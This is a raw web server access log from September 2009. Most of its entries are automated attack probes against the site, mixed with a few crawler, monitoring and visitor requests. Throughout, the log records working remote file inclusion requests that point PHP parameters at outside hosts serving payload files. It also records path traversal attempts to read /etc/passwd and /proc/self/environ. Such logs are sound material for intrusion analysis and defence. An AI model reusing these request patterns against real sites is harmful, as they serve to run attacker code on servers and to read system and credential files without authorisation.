220.73.161.101 - - [12/Sep/2009:00:00:14 -0400] "GET /logs/error_log.Q109071200%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:00:00:15 -0400] "GET /logs/error_log.Q109071400%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:00:00:15 -0400] "GET /logs//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:00:00:15 -0400] "GET //template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:00:00:19 -0400] "GET /logs/error_log.Q109071200%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:00:00:46 -0400] "GET /logs/access_log.Q109070200%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:00:00:52 -0400] "GET /logs/error_log.Q109082700%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:00:00:59 -0400] "GET /logs/error_log.Q109070600%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:00:00:59 -0400] "GET /logs/error_log.Q109071600%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:00:01:14 -0400] "GET /logs/error_log.Q109070200%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:00:01:14 -0400] "GET /logs/access_log.Q109071600%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:00:01:25 -0400] "GET /logs/access_log.Q109071200%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:00:01:25 -0400] "GET /logs/access_log.Q109082700%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
91.202.4.158 - - [12/Sep/2009:00:01:50 -0400] "GET //include/scripts/export_batch.inc.php?DIR=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "-"
91.202.4.158 - - [12/Sep/2009:00:01:50 -0400] "GET /logs//include/scripts/export_batch.inc.php?DIR=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 240 "-" "-"
91.202.4.158 - - [12/Sep/2009:00:01:50 -0400] "GET /logs/access_log.Q109051800%20//include/scripts/export_batch.inc.php?DIR=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 263 "-" "-"
91.202.4.158 - - [12/Sep/2009:00:01:50 -0400] "GET //include/scripts/export_batch.inc.php?DIR=./../../../../../../../../etc/passwd HTTP/1.1" 404 235 "-" "-"
91.202.4.158 - - [12/Sep/2009:00:01:50 -0400] "GET /logs//include/scripts/export_batch.inc.php?DIR=./../../../../../../../../etc/passwd HTTP/1.1" 404 240 "-" "-"
91.202.4.158 - - [12/Sep/2009:00:01:50 -0400] "GET /logs/access_log.Q109051800%20//include/scripts/export_batch.inc.php?DIR=./../../../../../../../../etc/passwd HTTP/1.1" 404 263 "-" "-"
83.211.190.129 - - [12/Sep/2009:00:01:51 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sports.wisegiga.net/bbs/skin/rosun2005GLF_GALLERY(2)//id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
119.63.193.55 - - [12/Sep/2009:00:01:53 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
83.211.190.129 - - [12/Sep/2009:00:01:56 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sports.wisegiga.net/bbs/skin/rosun2005GLF_GALLERY(2)//id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
83.211.190.129 - - [12/Sep/2009:00:01:56 -0400] "GET /logs/access_log.Q109082000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sports.wisegiga.net/bbs/skin/rosun2005GLF_GALLERY(2)//id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.211.190.129 - - [12/Sep/2009:00:01:56 -0400] "GET /logs/error_log.Q109082000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sports.wisegiga.net/bbs/skin/rosun2005GLF_GALLERY(2)//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:00:02:34 -0400] "GET /logs/error_log.Q109071200%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:00:03:18 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.90.108.169 - - [12/Sep/2009:00:03:23 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:00:03:23 -0400] "GET /logs/access_log.Q109081100//?_SERVER[DOCUMENT_ROOT]=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:00:03:23 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 200 17503 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:00:03:51 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:00:03:51 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:00:03:51 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:00:04:35 -0400] "GET /logs/error_log.Q109071400%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:00:04:35 -0400] "GET //template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:00:04:35 -0400] "GET /logs//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:00:04:36 -0400] "GET /logs/access_log.Q109050800%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:00:04:43 -0400] "GET /logs/access_log.Q109082900%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
65.55.234.168 - - [12/Sep/2009:00:04:57 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/4.0"
65.55.234.168 - - [12/Sep/2009:00:04:57 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS HTTP/1.1" 200 73507 "-" "Mozilla/4.0"
83.211.190.129 - - [12/Sep/2009:00:05:01 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sports.wisegiga.net/bbs/skin/rosun2005GLF_GALLERY(2)//id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
83.211.190.129 - - [12/Sep/2009:00:05:01 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sports.wisegiga.net/bbs/skin/rosun2005GLF_GALLERY(2)//id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
83.211.190.129 - - [12/Sep/2009:00:05:01 -0400] "GET /logs/error_log.Q109082000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sports.wisegiga.net/bbs/skin/rosun2005GLF_GALLERY(2)//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.211.190.129 - - [12/Sep/2009:00:05:01 -0400] "GET /logs/access_log.Q109082000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sports.wisegiga.net/bbs/skin/rosun2005GLF_GALLERY(2)//id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:00:05:08 -0400] "GET /logs/access_log.Q109070200%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:00:05:21 -0400] "GET /logs/error_log.Q109082700%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:00:05:21 -0400] "GET /logs/error_log.Q109070600%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:00:05:21 -0400] "GET /logs/error_log.Q109071600%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:00:05:30 -0400] "GET /logs/error_log.Q109070200%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:00:05:41 -0400] "GET /logs/access_log.Q109071600%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
83.211.190.129 - - [12/Sep/2009:00:05:42 -0400] "GET /logs/access_log.Q109072600%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sports.wisegiga.net/bbs/skin/rosun2005GLF_GALLERY(2)//id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
83.211.190.129 - - [12/Sep/2009:00:05:42 -0400] "GET /logs/access_log.Q109070400%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sports.wisegiga.net/bbs/skin/rosun2005GLF_GALLERY(2)//id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:00:05:46 -0400] "GET /logs/access_log.Q109071200%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:00:05:58 -0400] "GET /logs/access_log.Q109082700%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:00:06:07 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:06:10 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:06:10 -0400] "GET /logs/access_log.Q109050700///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:06:10 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 200 17504 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:06:26 -0400] "GET /logs/access_log.Q109070800///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:06:33 -0400] "GET /logs/access_log.Q109050700///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:06:33 -0400] "GET /logs/access_log.Q109052500///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:06:36 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:06:39 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:06:39 -0400] "GET /logs/access_log.Q109050700///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:06:36 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 200 17504 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:06:39 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 200 17504 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:06:42 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:06:42 -0400] "GET /logs/access_log.Q109050700///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:06:42 -0400] "GET /logs/access_log.Q109052500///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:06:42 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 200 17504 "-" "Mozilla/5.0"
199.120.90.223 - - [12/Sep/2009:00:06:43 -0400] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
199.120.90.223 - - [12/Sep/2009:00:06:44 -0400] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
199.120.90.223 - - [12/Sep/2009:00:06:44 -0400] "GET /logs/access_log.Q109081100%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:06:54 -0400] "GET /logs/access_log.Q109070800///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:00:07:11 -0400] "GET /logs/error_log.Q109071200%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
199.120.90.223 - - [12/Sep/2009:00:07:14 -0400] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
199.120.90.223 - - [12/Sep/2009:00:07:14 -0400] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
199.120.90.223 - - [12/Sep/2009:00:07:14 -0400] "GET /logs/access_log.Q109081100%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
110.36.13.60 - - [12/Sep/2009:00:07:16 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; desktopsmiley_3_3_439727021313757825_1_819)"
110.36.13.60 - - [12/Sep/2009:00:07:16 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; desktopsmiley_3_3_439727021313757825_1_819)"
110.36.13.60 - - [12/Sep/2009:00:07:22 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; desktopsmiley_3_3_439727021313757825_1_819)"
110.36.13.60 - - [12/Sep/2009:00:07:22 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; desktopsmiley_3_3_439727021313757825_1_819)"
199.120.90.223 - - [12/Sep/2009:00:07:26 -0400] "GET /logs/access_log.Q109071900%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:07:31 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:07:31 -0400] "GET /logs/access_log.Q109050700%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:07:31 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 200 17504 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:07:47 -0400] "GET /logs/access_log.Q109051700%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
199.120.90.223 - - [12/Sep/2009:00:07:57 -0400] "GET /logs/access_log.Q109071900%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
83.211.190.129 - - [12/Sep/2009:00:07:59 -0400] "GET /logs/access_log.Q109072600%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sports.wisegiga.net/bbs/skin/rosun2005GLF_GALLERY(2)//id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
83.211.190.129 - - [12/Sep/2009:00:08:03 -0400] "GET /logs/access_log.Q109070400%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sports.wisegiga.net/bbs/skin/rosun2005GLF_GALLERY(2)//id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
66.249.71.201 - - [12/Sep/2009:00:08:16 -0400] "GET /images/bt_left-b.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
209.59.12.99 - - [12/Sep/2009:00:08:18 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.22.96.36 - - [12/Sep/2009:00:11:05 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jrigutto.com/blog2/media/id? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
209.59.12.99 - - [12/Sep/2009:00:13:18 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.34.163.101 - - [12/Sep/2009:00:14:41 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:00:14:41 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:00:14:41 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:00:15:05 -0400] "GET /logs/error_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:00:15:17 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:00:15:17 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:00:15:17 -0400] "GET /logs/error_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:00:15:17 -0400] "GET /logs/error_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:00:15:24 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:00:15:24 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:00:15:24 -0400] "GET /logs/error_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:00:15:24 -0400] "GET /logs/error_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
205.234.246.98 - - [12/Sep/2009:00:16:42 -0400] "GET /logs/access_log.Q109081300%20//index2.php?prefix=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 237 "-" "-"
205.234.246.98 - - [12/Sep/2009:00:16:42 -0400] "GET /logs/access_log.Q109081300%20//index2.php?prefix=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 237 "-" "-"
205.234.246.98 - - [12/Sep/2009:00:16:42 -0400] "GET //index2.php?prefix=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "-"
205.234.246.98 - - [12/Sep/2009:00:16:42 -0400] "GET /logs//index2.php?prefix=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 214 "-" "-"
205.234.246.98 - - [12/Sep/2009:00:16:42 -0400] "GET //index2.php?prefix=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "-"
205.234.246.98 - - [12/Sep/2009:00:16:43 -0400] "GET /logs//index2.php?prefix=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 214 "-" "-"
123.125.66.86 - - [12/Sep/2009:00:17:52 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
66.148.68.101 - - [12/Sep/2009:00:18:05 -0400] "GET /logs/access_log.Q109051200%20%20//setup.php?dir=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.148.68.101 - - [12/Sep/2009:00:18:05 -0400] "GET //setup.php?dir=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.148.68.101 - - [12/Sep/2009:00:18:05 -0400] "GET /logs//setup.php?dir=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:00:18:14 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:00:18:14 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:00:18:15 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:00:18:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.34.163.101 - - [12/Sep/2009:00:18:20 -0400] "GET /logs/access_log.Q109082500%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
83.16.135.210 - - [12/Sep/2009:00:19:12 -0400] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jrigutto.com/blog2/media/id? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
83.16.135.210 - - [12/Sep/2009:00:20:21 -0400] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jrigutto.com/blog2/media/id? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
220.181.7.68 - - [12/Sep/2009:00:20:49 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
213.215.235.2 - - [12/Sep/2009:00:21:18 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:00:21:18 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
